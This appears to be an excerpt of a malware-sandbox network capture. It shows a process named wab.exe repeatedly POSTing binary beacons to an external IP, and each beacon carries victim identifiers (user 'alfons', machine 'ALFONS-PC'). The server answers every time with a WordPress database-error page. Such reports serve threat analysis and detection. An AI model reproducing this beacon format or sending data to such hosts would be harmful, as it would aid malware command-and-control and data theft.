                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:38.004254103 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:38.004265070 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              36192.168.2.54975624.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:38.343274117 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:38.505817890 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:39.344233990 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:38 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:39.344255924 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:39.344265938 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              37192.168.2.54975724.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:39.649079084 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:39.813005924 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:40.662664890 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:39 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:40.662698030 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:40.662714005 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              38192.168.2.54975824.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:40.987318993 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:41.150290012 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:41.940402031 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:41 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:41.940443993 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:41.940471888 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              39192.168.2.54975924.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:42.247155905 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:42.409832001 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:43.260286093 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:42 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
